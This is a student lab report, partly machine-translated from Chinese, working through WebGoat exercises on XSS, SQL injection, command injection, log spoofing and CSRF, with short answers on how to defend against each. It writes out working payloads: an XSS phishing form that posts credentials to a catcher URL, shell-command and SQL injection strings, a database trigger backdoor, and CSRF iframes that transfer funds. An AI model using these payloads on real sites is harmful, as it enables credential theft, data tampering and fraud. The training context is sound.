20155227 "Cyber Confrontation" EXP9 Web Security Foundation Practice

20155227 "Cyber Confrontation" EXP9 Web Security Foundation Practice Experiment Content

• About Webgoat
• Cross-site Scripting (XSS) Exercise
• Injection flaws Practice
• CSRF attack

Basic question Answer

• SQL injection attack principle, how to defend?

原理：SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，使非法数据侵入系统。

防御：1.对用户的输入进行校验，可以通过正则表达式，双"-"进行转换等。2.不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。3.不要使用管理员权限的数据库连接，为每个应用使用单独的权限有限的数据库连接。4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。5.应用的异常信息应该给出尽可能少的提示。6.采取辅助软件或网站平台来检测sql注入。

• What is the principle of XSS attack and how to defend it?

原理：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码（如，HTML代码和客户端脚本）植入到提供给其它用户使用的页面中，攻击者可以利用XSS漏洞旁路掉访问控制。

Defense:

1.特征匹配方式，在所有提交的信息中都进行匹配检查，一般会对“javascript”这个关键字进行检索，一旦发现提交信息中包含“javascript”，就认定为XSS攻击。2.对所有用户提交内容进行可靠的输入验证，包括对URL、查询关键字、HTTP头、POST数据等，仅接受指定长度范围内、采用适当格式、采用所预期的字符的内容提交，对其他的一律过滤。3.实现Session标记(session tokens)、CAPTCHA系统或者HTTP引用头检查，以防功能被第三方网站所执行。

• CSRF attack principle, how to defend?

原理：CSRF跨站请求伪造，也被称为“oneclickattack”或者sessionriding，通常缩写为CSRF或者XSRF，是一种对网站的恶意利用，通过伪装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击。

防御：1.在form中包含秘密信息、用户指定的代号作为cookie之外的验证。2.“双提交”cookie。某个授权的cookie在form post之前正被JavaScript代码读取，那么限制跨域规则将被应用。服务器需要在Post请求体或者URL中包含授权cookie的请求，那么这个请求必须来自于受信任的域。3.用户在浏览其它站点前登出站点或者在浏览器会话结束后清理浏览器的cookie。

The experimental process records 1. WebGoat

• To turn on webgoat, first download the Java package and open the Webgoat:java -jar webgoat-container-7.0.1-war-exec.jar

• Access on the browser localhost:8080/WebGoat , log on.

2.XSS Attack (1) Phishing with XSS

• This topic we will enter the XSS attack code in the search box:

</form>  <script>function hack(){ XSSImage=new Image;XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);}   </script><form name="phish"><br><br><HR>  <H2>This feature requires account login:</H2><br>  <br>Enter Username:<br>  <input type="text" name="user">  <br>Enter Password:<br>  <input type="password" name = "pass"><br>  <input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

• After you enter the attack code in the search box and click Search, you will see a form that asks for your username and password, enter your username and password, click Sign In, and Webgoat will capture and feed you the information you have entered:

(2) reflected XSS-reflex XSS attack

In the code box, enter<script>alert("I am 20155227gyl");</script>

(3) Stored XSS Attacks

• Topic Requirements: To create illegal message content, you can cause other users to load unexpected pages or content when they visit.
• Directly in the title input, and then message enter a string of code, such as: <script>alert("5227!");</script> after the submission, click the post you just created, a successful pop-up window, indicating the success of the attack!

3.Injection Flaws (1) Command injection

• The topic requires the ability to execute system commands on the target host, and I find that the source code can be modified by an extension under Firefox Firebug , for exampleBackDoors.help旁边加上& netstat -an & ipconfig

• Select the modified value again point view , you can see the command is executed, the system network connection situation:

(2) Numeric SQL injection

• This question probably means that this form allows the user to see the weather data, SQL注入 making it possible to see all the data.
• The SQL injection is station injected into the field to inject the feature character, to group the new SQL statement, to SELECT * FROM weather_data WHERE station = [station] get all the weather data, just station add one after any value in 1=1 , because the 1=1 is the permanent, select the city to which you are modifying the value point, You can get all the weather.

(3) Log Spoofing

This question probably means that the user name we entered will be appended to the log file. So we can use a decoy to use the user name to “admin” display "successful login" in the log, for example, enter in the User Name text box, gyl%0d%0aLogin Succeeded for username: admin where %0d is the carriage return, %0a is a newline character:

(4) Lab:sql injectionstage 1:string SQL Injection

• Title: Use string sql injection to log in without the correct password boss .
• Enter--In the password bar ‘ or 1=1 SQL注入 , but login failed.
• Check the source code, remove the limit on the length of the input, login success.

Stage 3:numeric SQL Injection

• Topic Requirements: Through the injection of statements, browse to the original can not browse information. larryView BOSS The account information of an ordinary employee through an account. First we use the method of the previous question login Larry account! Enter in the Password box ‘ or 1=1 -- , log in and find that we can only see Larry a person's salary information.

• The button to browse employee information is ViewProfile . Analyze This button in the Code of the page, and find that this place is to 员工ID pass parameters as an index, we have to reach the Larry goal of browsing the boss's account information, change the value value 101 or 1=1 order by salary desc -- of the So the boss's message will be the first one:

(5) String SQL injection

• This form allows users to check their credit card numbers and use them to SQL注入 see all credit card numbers.
• We construct a never-true "1", then regardless of whether the previous WHERE set can be executed, so the construction of the statement ‘or 1=‘1 , the success of the full credit card number.

(6) Blind Numeric SQL Injection

• The title requirement is to get a value stored in the pins table of pin contents, line number cc_number=1111222233334444 , is a int型 data.
  Then use BurpSuite to intercept, intercept after action--send to intruder the brute force, use sniper the mode, choose 10000 to do digital blasting (select the clear default blasting point before the removal), from 1 to 10000, the step is 1. The length of the message that can be found is 2364 obviously different from the others, and that value should be 2364 :

(7) Database backdoors

• Enter Example 101 to try and get the user's information.

• Observing that the input statement was not validated, we entered the statement: the 101; update employee set salary=10000 user's salary was successfully turned into a successful 10000 attack:

• Input statement101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘[email protected]‘ WHERE userid = NEW.userid
• Once a new user is added to the table, the new user's mailbox is changed to the mailbox I set up in the user table.

4.CSRF Attack (1) Cross Site Request forgery

• Title Requirements: Need to write a URL lure other users click, thereby triggering CSRF攻击 , we can be in the form of pictures will be URL put in Message框 , then the URL other users are not visible, the user once click on the image, will trigger an CSRF event.
• To view the values of your computer Screen和menu :

• Then the message input in it will send a transfer of money request, steal money. After submission, you will see a new message in the message list, click the message, the current page will download the message and display it, the user's money, to achieve CSRF the purpose of the attack.

• Submit a link to the epigenetic20155227

• Click to view information about user actions:

(2) CSRF Prompt By-Pass

• This is the use of CSRF for the transfer of the fake operation, but this time includes two requests, one is the transfer request, and the second is to confirm the transfer successful request, that is, the need to pass two additional parameters to the server (transferfunds=4000,transferfunds=confirm).
• Look at the right side of the page Parameters中的src和menu值 and enter the number in the box and enter the code in the title message box:

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe><iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

• The next thing to do is the previous question.

• However, there is no successful √ on the left, so enter the localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=5000 confirmation Transfer request page in the browser:

Click the CONFIRM button, then enter the URL in the browser: localhost:8080/WebGoat/attack?Screen=266&menu=900&transferFunds=CONFIRM , successfully transferred 5000 yuan:

Experimental experience

This experiment is really difficult, mainly because the environment has been wrong, after trying for a long time before deciding to directly copy a virtual machine. After starting the experiment, I found that the content of this experiment was English, it really collapsed ... But through the Webgoat practice, I learned SQL注入攻击 , XSS攻击 and CSRF攻击 some small routines, but also a small harvest it.

20155227 "Cyber Confrontation" EXP9 Web Security Foundation Practice